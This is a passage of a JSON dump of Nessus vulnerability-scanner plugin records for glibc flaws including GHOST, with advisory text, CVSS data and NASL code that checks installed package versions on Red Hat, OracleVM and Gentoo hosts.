audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.6-20150123.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:48", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Switch to use malloc when the input line is too long [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support (CVE-2014-5119, - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in 
*valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly count the number of hardware threads sharing a cacheline (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers (#957089).\n\n - Test on init_fct, not result->__init_fct, after demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. 
(#857387)\n\n - Handle failure of _nl_explode_name in all cases (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's in current working directory. 
(#808342)\n\n - Incorrect initialization order for dynamic loader (#813348)\n\n - Fix return code when stopping already stopped nscd daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\n\n - Correct test for detecting cycle during topo sort (#729661)\n\n - Check values from TZ file header (#767688)\n\n - Complete the numeric settings fix (#675259)\n\n - Complete the change for error codes from pthread_create (#707998)\n\n - Truncate time values in Linux futimes when falling back to utime 
(#758252)\n\n - Update systemtaparches\n\n - Add rules to build libresolv with SSP flags (#756453)\n\n - Fix PLT reference\n\n - Workaround misconfigured system (#702300)\n\n - Update systemtaparches\n\n - Correct cycle detection during dependency sorting (#729661)\n\n - Add gdb hooks (#711924)\n\n - Fix alloca accounting in strxfm and strcoll (#585433)\n\n - Correct cycle detection during dependency sorting (#729661)\n\n - ldd: never run file directly (#531160)\n\n - Implement greedy matching of weekday and month names (#657570)\n\n - Fix incorrect numeric settings (#675259)\n\n - Implement new mode for NIS passwd.adjunct.byname table (#678318)\n\n - Query NIS domain only when needed (#703345)\n\n - Count total processors using sysfs (#706894)\n\n - Translate clone error if necessary (#707998)\n\n - Workaround kernel clobbering robust list (#711531)\n\n - Use correct type when casting d_tag (#599056, CVE-2010-0830)\n\n - Report write error in addmnt even for cached streams (#688980, CVE-2011-1089)\n\n - Don't underestimate length of DST substitution (#694655)\n\n - Don't allocate executable stack when it cannot be allocated in the first 4G (#448011)\n\n - Initialize resolver state in nscd (#676039)\n\n - No cancel signal in unsafe places (#684808)\n\n - Check size of pattern in wide character representation in fnmatch (#681054)\n\n - Avoid too much stack use in fnmatch (#681054, CVE-2011-1071)\n\n - Properly quote output of locale (#625893, CVE-2011-1095)\n\n - Don't leave empty element in rpath when skipping the first element, ignore rpath elements containing non-isolated use of $ORIGIN when privileged (#667974, CVE-2011-0536)\n\n - Fix handling of newline in addmntent (#559579, CVE-2010-0296)\n\n - Don't ignore $ORIGIN in libraries (#670988)\n\n - Fix false assertion (#604796)\n\n - Fix ordering of DSO constructors and destructors (#604796)\n\n - Fix typo (#531576)\n\n - Fix concurrency problem between dl_open and dl_iterate_phdr (#649956)\n\n - Require suid bit 
on audit objects in privileged programs (#645678, CVE-2010-3856)\n\n - Never expand $ORIGIN in privileged programs (#643819, CVE-2010-3847)\n\n - Add timestamps to nscd logs (#527558)\n\n - Fix index wraparound handling in memusage (#531576)\n\n - Handle running out of buffer space with IPv6 mapping enabled (#533367)\n\n - Don't deadlock in __dl_iterate_phdr while (un)loading objects (#549813)\n\n - Avoid alloca in setenv for long strings (#559974)\n\n - Recognize POWER7 and ISA 2.06 (#563563)\n\n - Add support for AT_BASE_PLATFORM (#563599)\n\n - Restore locking in free_check (#585674)\n\n - Fix lookup of collation sequence value during regexp matching (#587360)\n\n - Fix POWER6 memcpy/memset (#579011)\n\n - Fix scope handling during dl_close (#593675)\n\n - Enable -fasynchronous-unwind-tables throughout (#593047)\n\n - Fix crash when aio thread creation fails (#566712)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : glibc (OVMSA-2015-0023) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856", "CVE-2011-0536", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2013-0242", "CVE-2013-1914", "CVE-2013-4332", "CVE-2014-0475", "CVE-2014-5119", "CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2015-0023.NASL", "href": 
"https://www.tenable.com/plugins/nessus/81118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0023.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81118);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\", \"CVE-2011-0536\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-4332\", \"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2015-0235\");\n script_bugtraq_id(40063, 44154, 44347, 46563, 46740, 47370, 57638, 58839, 62324, 64465, 68505, 68983, 69738, 72325);\n\n script_name(english:\"OracleVM 3.2 : glibc (OVMSA-2015-0023) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Switch to use malloc when the input line is too long\n [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251]\n (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support\n (CVE-2014-5119, - _nl_find_locale: Improve handling of\n crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd\n daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return 
EINVAL error for negative sizees to getgroups\n (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly\n count the number of hardware threads sharing a cacheline\n (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers\n (#957089).\n\n - Test on init_fct, not result->__init_fct, after\n demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp\n (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application\n crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code\n with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked\n (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available\n (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. 
(#857387)\n\n - Handle failure of _nl_explode_name in all cases\n (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to\n manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by\n 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in\n strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding\n modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character\n 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name\n containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and\n others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's\n in current working directory. 
(#808342)\n\n - Incorrect initialization order for dynamic loader\n (#813348)\n\n - Fix return code when stopping already stopped nscd\n daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use\n MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher\n (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make\n implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias\n (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members\n (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency\n (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel\n (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints\n (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists\n (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to\n bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\n\n - Correct test for detecting cycle during topo sort\n (#729661)\n\n - Check values from TZ file header (#767688)\n\n - Complete the numeric settings fix (#675259)\n\n - Complete the change for error codes from pthread_create\n (#707998)\n\n - Truncate time values in Linux futimes when 
falling back\n to utime (#758252)\n\n - Update systemtaparches\n\n - Add rules to build libresolv with SSP flags (#756453)\n\n - Fix PLT reference\n\n - Workaround misconfigured system (#702300)\n\n - Update systemtaparches\n\n - Correct cycle detection during dependency sorting\n (#729661)\n\n - Add gdb hooks (#711924)\n\n - Fix alloca accounting in strxfm and strcoll (#585433)\n\n - Correct cycle detection during dependency sorting\n (#729661)\n\n - ldd: never run file directly (#531160)\n\n - Implement greedy matching of weekday and month names\n (#657570)\n\n - Fix incorrect numeric settings (#675259)\n\n - Implement new mode for NIS passwd.adjunct.byname table\n (#678318)\n\n - Query NIS domain only when needed (#703345)\n\n - Count total processors using sysfs (#706894)\n\n - Translate clone error if necessary (#707998)\n\n - Workaround kernel clobbering robust list (#711531)\n\n - Use correct type when casting d_tag (#599056,\n CVE-2010-0830)\n\n - Report write error in addmnt even for cached streams\n (#688980, CVE-2011-1089)\n\n - Don't underestimate length of DST substitution (#694655)\n\n - Don't allocate executable stack when it cannot be\n allocated in the first 4G (#448011)\n\n - Initialize resolver state in nscd (#676039)\n\n - No cancel signal in unsafe places (#684808)\n\n - Check size of pattern in wide character representation\n in fnmatch (#681054)\n\n - Avoid too much stack use in fnmatch (#681054,\n CVE-2011-1071)\n\n - Properly quote output of locale (#625893, CVE-2011-1095)\n\n - Don't leave empty element in rpath when skipping the\n first element, ignore rpath elements containing\n non-isolated use of $ORIGIN when privileged (#667974,\n CVE-2011-0536)\n\n - Fix handling of newline in addmntent (#559579,\n CVE-2010-0296)\n\n - Don't ignore $ORIGIN in libraries (#670988)\n\n - Fix false assertion (#604796)\n\n - Fix ordering of DSO constructors and destructors\n (#604796)\n\n - Fix typo (#531576)\n\n - Fix concurrency problem between dl_open 
and\n dl_iterate_phdr (#649956)\n\n - Require suid bit on audit objects in privileged programs\n (#645678, CVE-2010-3856)\n\n - Never expand $ORIGIN in privileged programs (#643819,\n CVE-2010-3847)\n\n - Add timestamps to nscd logs (#527558)\n\n - Fix index wraparound handling in memusage (#531576)\n\n - Handle running out of buffer space with IPv6 mapping\n enabled (#533367)\n\n - Don't deadlock in __dl_iterate_phdr while (un)loading\n objects (#549813)\n\n - Avoid alloca in setenv for long strings (#559974)\n\n - Recognize POWER7 and ISA 2.06 (#563563)\n\n - Add support for AT_BASE_PLATFORM (#563599)\n\n - Restore locking in free_check (#585674)\n\n - Fix lookup of collation sequence value during regexp\n matching (#587360)\n\n - Fix POWER6 memcpy/memset (#579011)\n\n - Fix scope handling during dl_close (#593675)\n\n - Enable -fasynchronous-unwind-tables throughout (#593047)\n\n - Fix crash when aio thread creation fails (#566712)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000260.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?acafac78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:19", "description": "The remote host is affected by the vulnerability described in GLSA-201503-04 (GNU C Library: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the GNU C Library.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker may be able to execute arbitrary code or cause a Denial of Service condition,.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2015-03-09T00:00:00", "type": "nessus", "title": "GLSA-201503-04 : GNU C Library: Multiple vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3404", "CVE-2012-3405", "CVE-2012-3406", "CVE-2012-3480", "CVE-2012-4412", "CVE-2012-4424", "CVE-2012-6656", "CVE-2013-0242", "CVE-2013-1914", "CVE-2013-2207", "CVE-2013-4237", "CVE-2013-4332", "CVE-2013-4458", "CVE-2013-4788", "CVE-2014-4043", "CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:glibc", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201503-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201503-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81689);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3404\", \"CVE-2012-3405\", \"CVE-2012-3406\", \"CVE-2012-3480\", \"CVE-2012-4412\", \"CVE-2012-4424\", \"CVE-2012-6656\", \"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-2207\", \"CVE-2013-4237\", \"CVE-2013-4332\", \"CVE-2013-4458\", \"CVE-2013-4788\", \"CVE-2014-4043\", \"CVE-2015-0235\");\n script_bugtraq_id(54374, 54982, 55462, 55543, 57638, 58839, 61183, 61729, 61960, 62324, 63299, 68006, 69470, 72325);\n script_xref(name:\"GLSA\", value:\"201503-04\");\n\n script_name(english:\"GLSA-201503-04 : GNU C Library: Multiple vulnerabilities (GHOST)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201503-04\n(GNU C Library: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the GNU C Library.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local attacker may be able to execute arbitrary code or cause a Denial\n of Service condition,.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201503-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All glibc users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-libs/glibc-2.19-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-libs/glibc\", unaffected:make_list(\"ge 2.19-r1\"), vulnerable:make_list(\"lt 2.19-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
